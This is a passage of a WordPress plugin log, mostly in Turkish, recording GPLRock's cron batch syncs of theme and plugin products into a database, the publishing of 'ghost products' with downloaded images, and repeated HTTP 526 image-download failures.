çalıştırılıyor [09-Mar-2026 15:50:19 UTC] GPLRock API Sync: Batch başlıyor - Offset: 6200, Total: 3900/9737 [09-Mar-2026 15:50:20 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 15:50:21 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 16:12:40 UTC] GPLRock API Sync: Batch başlıyor - Offset: 6400, Total: 4100/9737 [09-Mar-2026 16:12:41 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 16:12:41 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 16:12:42 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 16:12:43 UTC] GPLRock API Sync: Batch başlıyor - Offset: 6500, Total: 4200/9737 [09-Mar-2026 16:12:43 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 16:12:44 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 16:29:04 UTC] GPLRock API Sync: Batch başlıyor - Offset: 6700, Total: 4400/9737 [09-Mar-2026 16:29:05 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 16:29:05 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 16:29:05 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 16:29:05 UTC] GPLRock API Sync: Batch başlıyor - Offset: 6800, Total: 4500/9737 [09-Mar-2026 16:29:06 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 16:29:08 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 16:30:07 UTC] GPLRock API Sync: Batch başlıyor - Offset: 7000, Total: 4700/9737 [09-Mar-2026 16:30:08 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 16:30:08 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 16:30:08 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 16:30:08 UTC] GPLRock API Sync: Batch başlıyor - Offset: 7100, Total: 4800/9737 [09-Mar-2026 16:30:10 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 16:30:10 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 16:32:04 UTC] GPLRock API Sync: Batch başlıyor - Offset: 7300, Total: 5000/9737 [09-Mar-2026 16:32:05 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 16:32:06 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 16:32:06 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 16:32:06 UTC] GPLRock API Sync: Batch başlıyor - Offset: 7400, Total: 5100/9737 [09-Mar-2026 16:32:07 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 16:32:07 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:18:45 UTC] GPLRock API Sync: Batch başlıyor - Offset: 7500, Total: 5200/9737 [09-Mar-2026 17:18:46 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:18:47 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:18:47 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 17:18:47 UTC] GPLRock API Sync: Batch başlıyor - Offset: 7600, Total: 5300/9737 [09-Mar-2026 17:18:48 UTC] GPLRock: Image downloaded successfully for product lets-review-wordpress-plugin-with-affiliate-options (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bb65ff9a.jpg [09-Mar-2026 17:18:48 UTC] GPLRock: Using pre-downloaded image for product lets-review-wordpress-plugin-with-affiliate-options: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bb65ff9a.jpg [09-Mar-2026 17:18:48 UTC] GPLRock: Ghost product published with image - Product ID: lets-review-wordpress-plugin-with-affiliate-options [09-Mar-2026 17:18:48 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:18:48 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:18:49 UTC] GPLRock: Image downloaded successfully for product bourz-life-entertainment-fashion-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fae8997f.jpg [09-Mar-2026 17:18:50 UTC] GPLRock: Using pre-downloaded image for product bourz-life-entertainment-fashion-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fae8997f.jpg [09-Mar-2026 17:18:50 UTC] GPLRock: Ghost product published with image - Product ID: bourz-life-entertainment-fashion-blog-theme [09-Mar-2026 17:18:51 UTC] GPLRock: Image downloaded successfully for product creatink-multiconcept-responsive-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bff4be76.jpg [09-Mar-2026 17:18:51 UTC] GPLRock: Using pre-downloaded image for product creatink-multiconcept-responsive-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bff4be76.jpg [09-Mar-2026 17:18:51 UTC] GPLRock: Ghost product published with image - Product ID: creatink-multiconcept-responsive-wordpress-theme [09-Mar-2026 17:18:53 UTC] GPLRock: Image downloaded successfully for product afela-flexible-multi-purpose-html5-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4c40a4bd.png [09-Mar-2026 17:18:53 UTC] GPLRock: Using pre-downloaded image for product afela-flexible-multi-purpose-html5-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4c40a4bd.png [09-Mar-2026 17:18:53 UTC] GPLRock: Ghost product published with image - Product ID: afela-flexible-multi-purpose-html5-template [09-Mar-2026 17:18:54 UTC] GPLRock: Image downloaded successfully for product asgard-multipurpose-messages-and-social-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bcbf6ef4.jpg [09-Mar-2026 17:18:55 UTC] GPLRock: Using pre-downloaded image for product asgard-multipurpose-messages-and-social-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bcbf6ef4.jpg [09-Mar-2026 17:18:55 UTC] GPLRock: Ghost product published with image - Product ID: asgard-multipurpose-messages-and-social-builder [09-Mar-2026 17:18:56 UTC] GPLRock: Image downloaded successfully for product customizable-headings-for-elementor-headinger (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6a3c8a40.jpg [09-Mar-2026 17:18:56 UTC] GPLRock: Using pre-downloaded image for product customizable-headings-for-elementor-headinger: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6a3c8a40.jpg [09-Mar-2026 17:18:56 UTC] GPLRock: Ghost product published with image - Product ID: customizable-headings-for-elementor-headinger [09-Mar-2026 17:18:57 UTC] GPLRock: Image downloaded successfully for product snow-mountain-ski-resort-snowboard-school-wp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a84cde74.png [09-Mar-2026 17:18:58 UTC] GPLRock: Using pre-downloaded image for product snow-mountain-ski-resort-snowboard-school-wp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a84cde74.png [09-Mar-2026 17:18:58 UTC] GPLRock: Ghost product published with image - Product ID: snow-mountain-ski-resort-snowboard-school-wp [09-Mar-2026 17:18:59 UTC] GPLRock: Image downloaded successfully for product cosmetista-beauty-makeup-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e997a8b6.jpg [09-Mar-2026 17:19:00 UTC] GPLRock: Using pre-downloaded image for product cosmetista-beauty-makeup-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e997a8b6.jpg [09-Mar-2026 17:19:00 UTC] GPLRock: Ghost product published with image - Product ID: cosmetista-beauty-makeup-theme [09-Mar-2026 17:19:05 UTC] GPLRock: Image downloaded successfully for product arvo-a-clever-flexible-multipurpose-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af798ae0.jpg [09-Mar-2026 17:19:05 UTC] GPLRock: Using pre-downloaded image for product arvo-a-clever-flexible-multipurpose-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af798ae0.jpg [09-Mar-2026 17:19:05 UTC] GPLRock: Ghost product published with image - Product ID: arvo-a-clever-flexible-multipurpose-wordpress [09-Mar-2026 17:19:07 UTC] GPLRock: Image downloaded successfully for product rubbez-woocommerce-corporate-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4fb451f3.png [09-Mar-2026 17:19:07 UTC] GPLRock: Using pre-downloaded image for product rubbez-woocommerce-corporate-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4fb451f3.png [09-Mar-2026 17:19:07 UTC] GPLRock: Ghost product published with image - Product ID: rubbez-woocommerce-corporate-wordpress-theme [09-Mar-2026 17:19:07 UTC] GPLRock API Sync: Batch başlıyor - Offset: 7500, Total: 5200/9737 [09-Mar-2026 17:19:08 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:19:10 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [09-Mar-2026 17:19:11 UTC] GPLRock API Sync: Batch başlıyor - Offset: 7600, Total: 5200/9737 [09-Mar-2026 17:19:11 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:19:13 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [09-Mar-2026 17:19:13 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 17:19:13 UTC] GPLRock API Sync: Batch başlıyor - Offset: 7700, Total: 5200/9737 [09-Mar-2026 17:19:15 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:19:15 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:19:16 UTC] GPLRock API Sync: Batch başlıyor - Offset: 7800, Total: 5300/9737 [09-Mar-2026 17:19:17 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:19:17 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:19:27 UTC] GPLRock API Sync: Batch başlıyor - Offset: 8000, Total: 5500/9737 [09-Mar-2026 17:19:28 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:19:29 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:20:31 UTC] GPLRock API Sync: Batch başlıyor - Offset: 8200, Total: 5700/9737 [09-Mar-2026 17:20:32 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:20:32 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:20:32 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 17:20:32 UTC] GPLRock API Sync: Batch başlıyor - Offset: 8300, Total: 5800/9737 [09-Mar-2026 17:20:33 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:20:33 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:21:30 UTC] GPLRock API Sync: Batch başlıyor - Offset: 8500, Total: 6000/9737 [09-Mar-2026 17:21:31 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:21:31 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:21:31 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 17:21:31 UTC] GPLRock API Sync: Batch başlıyor - Offset: 8600, Total: 6100/9737 [09-Mar-2026 17:21:32 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:21:33 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:23:32 UTC] GPLRock API Sync: Batch başlıyor - Offset: 8800, Total: 6300/9737 [09-Mar-2026 17:23:33 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:23:35 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:23:35 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 17:23:35 UTC] GPLRock API Sync: Batch başlıyor - Offset: 8900, Total: 6400/9737 [09-Mar-2026 17:23:36 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:23:37 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:25:32 UTC] GPLRock API Sync: Batch başlıyor - Offset: 9100, Total: 6600/9737 [09-Mar-2026 17:25:33 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:25:33 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:25:33 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 17:25:33 UTC] GPLRock API Sync: Batch başlıyor - Offset: 9200, Total: 6700/9737 [09-Mar-2026 17:25:34 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:25:34 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:27:33 UTC] GPLRock API Sync: Batch başlıyor - Offset: 9400, Total: 6900/9737 [09-Mar-2026 17:27:34 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:27:35 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:27:36 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 17:27:36 UTC] GPLRock API Sync: Batch başlıyor - Offset: 9500, Total: 7000/9737 [09-Mar-2026 17:27:37 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:27:38 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:29:38 UTC] GPLRock API Sync: Batch başlıyor - Offset: 9700, Total: 7200/9737 [09-Mar-2026 17:29:38 UTC] GPLRock: 37 ürün kaydediliyor - 1 batch [09-Mar-2026 17:29:39 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 37, Update: 0, Skip: 0, Toplam: 37 [09-Mar-2026 17:29:39 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 17:29:39 UTC] GPLRock API Sync: Batch başlıyor - Offset: 9800, Total: 7237/9737 [09-Mar-2026 17:29:40 UTC] GPLRock API Sync: Tüm ürünler çekildi (7237 toplam) [09-Mar-2026 17:40:58 UTC] GPLRock Auto Sync Cron: Tüm sync tamamlandı, cron durduruldu [09-Mar-2026 17:41:06 UTC] GPLRock: Image downloaded successfully for product industrial-business-responsive-wp-theme-offshore (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-17f06a80.webp [09-Mar-2026 17:41:06 UTC] GPLRock: Using pre-downloaded image for product industrial-business-responsive-wp-theme-offshore: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-17f06a80.webp [09-Mar-2026 17:41:06 UTC] GPLRock: Ghost product published with image - Product ID: industrial-business-responsive-wp-theme-offshore [09-Mar-2026 17:41:06 UTC] GPLRock: Image download failed for product alma-minimalist-multi-use-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:07 UTC] GPLRock: Image downloaded successfully for product archub-architecture-and-interior-design-wordpress-them (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0a5a43bf.jpg [09-Mar-2026 17:41:08 UTC] GPLRock: Using pre-downloaded image for product archub-architecture-and-interior-design-wordpress-them: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0a5a43bf.jpg [09-Mar-2026 17:41:08 UTC] GPLRock: Ghost product published with image - Product ID: archub-architecture-and-interior-design-wordpress-them [09-Mar-2026 17:41:08 UTC] GPLRock: Image download failed for product alma-minimalist-multi-use-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:09 UTC] GPLRock: Image downloaded successfully for product uncanny-automator-pro-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3024fe22.png [09-Mar-2026 17:41:09 UTC] GPLRock: Using pre-downloaded image for product uncanny-automator-pro-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3024fe22.png [09-Mar-2026 17:41:09 UTC] GPLRock: Ghost product published with image - Product ID: uncanny-automator-pro-wordpress-plugin [09-Mar-2026 17:41:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alma---minimalist-multi-use-wordpress-theme-23281.webp for product alma-minimalist-multi-use-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:41:11 UTC] GPLRock: Image download failed for product alma-minimalist-multi-use-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:11 UTC] GPLRock: Image downloaded successfully for product joomunited-wp-file-download-file-manager-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7b5f9cb3.jpg [09-Mar-2026 17:41:11 UTC] GPLRock: Using pre-downloaded image for product joomunited-wp-file-download-file-manager-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7b5f9cb3.jpg [09-Mar-2026 17:41:11 UTC] GPLRock: Ghost product published with image - Product ID: joomunited-wp-file-download-file-manager-for-wordpress [09-Mar-2026 17:41:12 UTC] GPLRock: Image downloaded successfully for product lafka-multi-store-burger-pizza-food-delivery-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d8393b1d.jpg [09-Mar-2026 17:41:13 UTC] GPLRock: Using pre-downloaded image for product lafka-multi-store-burger-pizza-food-delivery-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d8393b1d.jpg [09-Mar-2026 17:41:13 UTC] GPLRock: Ghost product published with image - Product ID: lafka-multi-store-burger-pizza-food-delivery-woocommerce-theme [09-Mar-2026 17:41:13 UTC] GPLRock: Image download failed for product alma-minimalist-multi-use-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:14 UTC] GPLRock: Image downloaded successfully for product promotors-car-service-and-detailing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dc60ed3b.jpg [09-Mar-2026 17:41:14 UTC] GPLRock: Using pre-downloaded image for product promotors-car-service-and-detailing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dc60ed3b.jpg [09-Mar-2026 17:41:14 UTC] GPLRock: Ghost product published with image - Product ID: promotors-car-service-and-detailing-elementor-template-kit [09-Mar-2026 17:41:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alma---minimalist-multi-use-wordpress-theme-23281.webp for product alma-minimalist-multi-use-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:41:15 UTC] GPLRock WARNING: Image download failed for product alma-minimalist-multi-use-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/alma---minimalist-multi-use-wordpress-theme-23281.webp [09-Mar-2026 17:41:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: alma-minimalist-multi-use-wordpress-theme [09-Mar-2026 17:41:15 UTC] GPLRock: Image downloaded successfully for product blurb-affiliate-marketing-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9c5daf6a.jpg [09-Mar-2026 17:41:15 UTC] GPLRock: Using pre-downloaded image for product blurb-affiliate-marketing-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9c5daf6a.jpg [09-Mar-2026 17:41:15 UTC] GPLRock: Ghost product published with image - Product ID: blurb-affiliate-marketing-wordpress-theme [09-Mar-2026 17:41:16 UTC] GPLRock: Image download failed for product mumbrass-full-screen-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:17 UTC] GPLRock: Image downloaded successfully for product graphina-pro-elementor-dynamic-charts-graphs-datatables (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-db871db5.png [09-Mar-2026 17:41:18 UTC] GPLRock: Image download failed for product mumbrass-full-screen-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:19 UTC] GPLRock: Using pre-downloaded image for product graphina-pro-elementor-dynamic-charts-graphs-datatables: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-db871db5.png [09-Mar-2026 17:41:19 UTC] GPLRock: Ghost product published with image - Product ID: graphina-pro-elementor-dynamic-charts-graphs-datatables [09-Mar-2026 17:41:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mumbrass---full-screen-personal-portfolio-wordpress-theme-12879.webp for product mumbrass-full-screen-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:41:21 UTC] GPLRock: Image download failed for product mumbrass-full-screen-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:23 UTC] GPLRock: Image download failed for product mumbrass-full-screen-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:23 UTC] GPLRock: Image downloaded successfully for product urban-law-lawyer-law-firm-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d960caee.webp [09-Mar-2026 17:41:25 UTC] GPLRock: Using pre-downloaded image for product urban-law-lawyer-law-firm-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d960caee.webp [09-Mar-2026 17:41:25 UTC] GPLRock: Ghost product published with image - Product ID: urban-law-lawyer-law-firm-elementor-template-kit [09-Mar-2026 17:41:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mumbrass---full-screen-personal-portfolio-wordpress-theme-12879.webp for product mumbrass-full-screen-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:41:25 UTC] GPLRock WARNING: Image download failed for product mumbrass-full-screen-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mumbrass---full-screen-personal-portfolio-wordpress-theme-12879.webp [09-Mar-2026 17:41:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mumbrass-full-screen-personal-portfolio-wordpress-theme [09-Mar-2026 17:41:30 UTC] GPLRock: Image downloaded successfully for product travenu-travel-tour-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3ba145cd.jpg [09-Mar-2026 17:41:30 UTC] GPLRock: Image download failed for product eventador-event-conference-marketing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:30 UTC] GPLRock: Using pre-downloaded image for product travenu-travel-tour-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3ba145cd.jpg [09-Mar-2026 17:41:30 UTC] GPLRock: Ghost product published with image - Product ID: travenu-travel-tour-agency-elementor-template-kit [09-Mar-2026 17:41:32 UTC] GPLRock: Image download failed for product eventador-event-conference-marketing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:32 UTC] GPLRock: Image downloaded successfully for product travella-tours-travel-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1db1ef80.jpg [09-Mar-2026 17:41:32 UTC] GPLRock: Using pre-downloaded image for product travella-tours-travel-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1db1ef80.jpg [09-Mar-2026 17:41:32 UTC] GPLRock: Ghost product published with image - Product ID: travella-tours-travel-agency-elementor-template-kit [09-Mar-2026 17:41:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eventador-event-conference-marketing-wordpress-theme-31129.webp for product eventador-event-conference-marketing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:41:36 UTC] GPLRock: Image download failed for product eventador-event-conference-marketing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:38 UTC] GPLRock: Image download failed for product eventador-event-conference-marketing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eventador-event-conference-marketing-wordpress-theme-31129.webp for product eventador-event-conference-marketing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:41:40 UTC] GPLRock WARNING: Image download failed for product eventador-event-conference-marketing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/eventador-event-conference-marketing-wordpress-theme-31129.webp [09-Mar-2026 17:41:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eventador-event-conference-marketing-wordpress-theme [09-Mar-2026 17:41:40 UTC] GPLRock: Image download failed for product logisco-logistics-transportation-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:42 UTC] GPLRock: Image download failed for product logisco-logistics-transportation-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/logisco---logistics--transportation-wordpress-29957.webp for product logisco-logistics-transportation-wordpress after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:41:45 UTC] GPLRock: Image download failed for product logisco-logistics-transportation-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:47 UTC] GPLRock: Image download failed for product logisco-logistics-transportation-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/logisco---logistics--transportation-wordpress-29957.webp for product logisco-logistics-transportation-wordpress after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:41:49 UTC] GPLRock WARNING: Image download failed for product logisco-logistics-transportation-wordpress. URL: https://meldwp.com/wp-content/uploads/logisco---logistics--transportation-wordpress-29957.webp [09-Mar-2026 17:41:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: logisco-logistics-transportation-wordpress [09-Mar-2026 17:41:49 UTC] GPLRock: Image download failed for product tokyo-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:51 UTC] GPLRock: Image download failed for product tokyo-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tokyo---personal-portfolio-wordpress-theme-32103.webp for product tokyo-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:41:54 UTC] GPLRock: Image download failed for product tokyo-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:56 UTC] GPLRock: Image download failed for product 